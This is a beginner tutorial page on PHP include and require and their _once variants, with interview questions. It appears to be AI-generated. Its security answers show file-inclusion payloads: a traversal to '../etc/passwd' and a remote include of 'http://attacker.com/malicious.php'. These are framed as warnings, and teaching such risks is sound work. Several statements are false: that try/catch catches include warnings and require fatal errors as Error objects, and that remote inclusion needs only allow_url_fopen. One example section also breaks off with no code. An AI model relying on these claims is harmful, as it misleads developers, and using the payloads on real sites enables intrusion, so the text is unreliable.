Php Include Require And File Inclusion Complete Guide

 Last Update:2025-06-23T00:00:00     .NET School AI Teacher - SELECT ANY TEXT TO EXPLANATION.    6 mins read      Difficulty-Level: beginner

Understanding the Core Concepts of PHP Include, Require, and File Inclusion

PHP include

  • Description: The include statement includes and evaluates the specified file during the execution of the script.
  • Use Case: Suitable when you want to include optional files and the script should continue running even if the included file fails to load.
  • Example: 
    <?php
include 'header.php';
echo "Main content here!";
include 'footer.php';
?>
  • Error Handling: If the file does not exist, it emits a warning (E_WARNING) and the script continues to execute.

PHP require

  • Description: Similar to include, the require statement includes and evaluates a specified file during script execution.
  • Use Case: Best for including critical files without which the script cannot function properly. The script will halt with a fatal error (E_COMPILE_ERROR) if the required file is missing.
  • Example: 
    <?php
require 'config.php'; // This might contain database credentials
require 'class/User.php'; // A necessary class definition
?>
  • Error Handling: Stops the script if an error occurs. Use this when functionality relies heavily on the file being included.

PHP include_once

  • Description: This statement ensures that the file is included at most once within any given script.
  • Use Case: Ideal for including files that define functions or classes. This prevents multiple definitions and possible conflicts.
  • Example: 
    <?php
include_once 'database/connection.php'; // Ensure database connection is established only once
?>
  • Error Handling: Emits a warning (E_WARNING) if the file can't be found.

PHP require_once

  • Description: Same as include_once, but it halts the script with a fatal error (E_COMPILE_ERROR) if the file is not found.
  • Use Case: Critical for including libraries or configuration files where multiple inclusions would cause issues.
  • Example: 
    <?php
require_once 'functions/utility.php'; // Utility functions are essential
require_once 'libraries/ThirdPartyLib.php'; // Avoid loading multiple times
?>
  • Error Handling: More strict than include_once; stops the execution of the script if it encounters an error.

Key Differences:

  1. Critical vs. Optional:

    • include and include_once are used when the script can still work without the file's content.
    • require and require_once are used for files essential for script functionality.

  2. Multiple Inclusion:

    • include and require do not check whether the file has already been included; they simply try to include it each time the statement is executed.
    • include_once and require_once check the existence of the file before including it, ensuring it's only included once per script.

  3. Error Behavior:

    • Failing to include a file with include or include_once results in a warning and the script continues.
    • Failing to include a file with require or require_once results in a fatal error and script termination.

Security Considerations:

  • Variable Path Inclusions: Be cautious about using variable paths for inclusion to prevent security vulnerabilities like Local File Inclusion (LFI). 
    <?php
$file = "footer.php";
include $file;

// Vulnerable Example - avoid!
$file = $_GET['page'];
include $file;
?>
  • Filtering Input: Always validate and sanitize any user input intended for file paths.

Performance Implications:

  • Disk I/O: Each inclusion statement performs a disk read operation, so overuse can impact performance. Try to minimize unnecessary inclusions.
  • Overhead: While modern systems handle these efficiently, reducing the number of inclusions can marginally improve page load times, especially on resource-constrained servers.

Conclusion:

PHP file inclusion offers powerful ways to maintain and reuse code easily. Understanding the difference between include, require, include_once, and require_once and using them correctly ensures better error handling, performance management, and security in your PHP applications. Always strive to write clean, efficient, and secure code with these best practices in mind.

Keywords: PHP, include, require, file inclusion, include_once, require_once, E_WARNING, E_COMPILE_ERROR, Local File Inclusion, LFI, disk read, performance, error handling, security, code reuse, header, footer, script execution, function definition, class definition, library, utility, configuration, validation, sanitization, resource-constrained servers, clean code, web development, programming

Online Code run

🔔 Note: Select your programming language to check or run code at

💻 Run Code Compiler

Step-by-Step Guide: How to Implement PHP Include, Require, and File Inclusion

1. Basic Usage of include and require

include

  • Purpose: Include and evaluate a specific file.
  • Behavior: If the file is not found, it generates a warning (E_WARNING) and the script continues execution.

Example:

  1. Create a file named header.php:

    <!-- header.php -->
<header>
    <h1>Welcome to My Website</h1>
</header>

  2. Create a file named index.php:

    <!-- index.php -->
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Home Page</title>
</head>
<body>
    <?php include 'header.php'; ?>

    <main>
        <p>This is the home page content.</p>
    </main>

    <footer>
        <p>Copyright © 2023</p>
    </footer>
</body>
</html>

require

  • Purpose: Include and evaluate a specific file.
  • Behavior: If the file is not found, it generates a fatal error (E_COMPILE_ERROR) and the script stops execution.

Example:

  1. Create a file named config.php:

    <!-- config.php -->
<?php
$username = 'admin';
$password = 'admin123';
?>

  2. Create a file named login.php:

    <!-- login.php -->
<?php
// Attempt to include the configuration file
require 'config.php';

echo "Username: " . $username . "<br>";
echo "Password: " . $password . "<br>";
?>

2. Using include_once and require_once

include_once

  • Purpose: Include and evaluate a specific file only once.
  • Behavior: If the file is not found, it generates a warning (E_WARNING) and the script continues execution.

Example:

  1. Create a file named functions.php:

    <!-- functions.php -->
<?php
function sayHello() {
    echo "Hello, world!";
}
?>

  2. Create a file named page.php:

    <!-- page.php -->
<?php
// Include the functions file
include_once 'functions.php';

// Call the function
sayHello();
?>

require_once

  • Purpose: Include and evaluate a specific file only once.
  • Behavior: If the file is not found, it generates a fatal error (E_COMPILE_ERROR) and the script stops execution.

Example:

  1. Create a file named session.php:

    <!-- session.php -->
<?php
session_start();
$_SESSION['user'] = 'example_user';
?>

  2. Create a file named dashboard.php:

    <!-- dashboard.php -->
<?php
// Include the session file only once
require_once 'session.php';

echo "User: " . $_SESSION['user'] . "<br>";
?>

3. Using Paths with include and require

You can use both absolute and relative paths to include/require files.

Example:

  1. Create a directory structure:

    /project
    /includes
        config.php
    index.php

  2. Create config.php in the /includes directory:

    <!-- includes/config.php -->
<?php
$username = 'admin';
$password = 'admin123';
?>

  3. Include config.php from index.php:

Top 10 Interview Questions & Answers on PHP Include, Require, and File Inclusion

Top 10 Questions and Answers on PHP Include, Require, and File Inclusion

1. What is the difference between include and require in PHP?

  • include: If an error occurs while including a file (e.g., the file does not exist or there's a syntax error), it generates a warning (E_WARNING) but execution continues.
  • require: If an error occurs while requiring a file, it generates a fatal error (E_COMPILE_ERROR) and halts the script.

For example:

include 'library.php'; // If this fails, it will issue a warning but keep running the code.
require 'library.php'; // If this fails, it will throw a fatal error and stop the code.

2. When would you use include_once instead of include?

Answer:
include_once ensures that the file is included only once during the entire script execution. This is useful to prevent duplicate definitions of functions, classes, and variables which can lead to fatal errors or undesirable behavior if included more than once.

For example:

include_once 'database_connection.php';
// Subsequent include_once calls will be ignored if 'database_connection.php' was already included.

3. When would you use require_once over require?

Answer:
require_once is similar to require, except it checks if the file was previously included and if so, it skips the process.

This prevents re-declaration errors due to multiple inclusions of the same file.

Example:

require_once 'config.php';

4. Can I pass variables to the included file?

Answer:
Yes, you can pass variables to an included file. When a file is included using include, include_once, require, or require_once, any variables defined before the include call will be available in the included file as well.

Here’s an example:

File variables.php:

$my_var = "Hello from variables.php";

Main file:

$my_var = 'Hello World!';
include 'variables.php';
echo $my_var; // Outputs: Hello from variables.php

// The value of $my_var in the main file has been overridden by the value in the included file.

5. What is the scope of variables in an included file?

Answer:
Variables included or required have the same scope as their point of inclusion. This means global scope unless they are inside a function.

For example:

$globalVar = 'I am global';

function displayVariables() {
    $localVar = 'I am local';
    
    include 'included_file.php';
    
    echo $globalVar; // Outputs: I am global
    echo $localVar;  // Outputs: I am local
    
    echo $includedVar; // Outputs: I am in included file and accessible here
}

// included_file.php
// $includedVar = 'I am in included file and accessible here';

displayVariables();

If $includedVar is defined inside a function within included_file.php, it would remain local to that function unless it was declared as global.

6. How can file inclusion lead to security vulnerabilities in PHP?

Answer:
Improper handling of file inclusion can lead to security vulnerabilities, particularly Local File Inclusion (LFI) and Remote File Inclusion (RFI). These attacks occur when user-supplied input is not properly sanitized before being used to include files, allowing attackers to access unintended files.

Local File Inclusion (LFI):

$page = $_GET['page']; // Suppose $_GET['page'] = '../etc/passwd'
include $page; // Leads to reading and possibly exposing sensitive system files.

Remote File Inclusion (RFI):

$page = $_GET['page']; // Suppose $_GET['page'] = 'http://attacker.com/malicious.php'
include $page; // Executes malicious code from an external site.

To mitigate these risks:

  • Use a whitelist approach for filenames to include.
  • Ensure user inputs are properly validated and sanitized.
  • Disable the allow_url_fopen and allow_url_include settings in your php.ini configuration to prevent RFI.

7. Can I include PHP files from a remote URL?

Answer:
By default, PHP can include files from a remote URL using include, include_once, require, or require_once provided that the allow_url_fopen directive in php.ini is enabled. But including files from remote URLs (often referred to as Remote File Inclusion, RFI) can expose your application to security risks like executing malicious code.

Remote File Inclusion Example:

include 'http://example.com/file.php';

However, the recommended practice is to avoid including files directly from remote resources to prevent unauthorized code execution and other security risks.

8. Is it possible to use include and require with different types of streams, not just files?

Answer:
Yes, PHP’s include and require can work with different types of streams, not just regular file paths. You need to ensure that the stream is configured to allow reading and that PHP's configuration (specifically allow_url_fopen) permits it if the stream is a URL.

Here’s an example of using include with a data:// URI:

include 'data://text/plain;base64,SGVsbG8sIFdvcmxkIQ==';  // Outputs: Hello, World!

Note: The usage of streams with file inclusion functions can also pose security risks if user inputs are used to form the stream URL without proper validation.

9. What are the best practices for PHP file inclusion?

Answer:
Here are some best practices to follow when using file inclusion in PHP:

  • Use include_once and require_once to ensure files are included only once.
  • Validate and sanitize all user-supplied inputs involved in file inclusion.
  • Avoid including files based on user inputs directly. Use a whitelist approach or map inputs to predefined, safe filepaths.
  • Do not concatenate base directory paths with user-supplied inputs; use functions like realpath() to resolve absolute paths safely.
  • Keep your codebase organized, use constants or functions to define common paths to avoid repeating them throughout scripts.

10. How do include and require behave with errors in PHP 7+?

Answer:
In PHP 7+, error handling regarding file inclusions has improved due to the introduction of throwable exceptions and Error objects. While include still generates a warning and require a fatal error, in PHP 7 and later, these warnings and fatal errors are instances of the Error class, which allows for more flexible error handling.

For example:

try {
    include 'nonexistentfile.php'; // Generates warning.
} catch (\Throwable $e) {
    // Catch and handle warning.
    echo 'Caught warning: ' . $e->getMessage();
}

try {
    require 'another_nonexistentfile.php'; // Generates fatal error.
} catch (\Throwable $e) {
    // Catch and handle fatal error.
    echo 'Caught fatal error: ' . $e->getMessage();
}

Handling these errors as exceptions gives developers more control over error management, enhancing the robustness of the application.

You May Like This Related .NET Topic

📥 Download Code ▶️ Watch Online 📖 Read Description

Login to post a comment.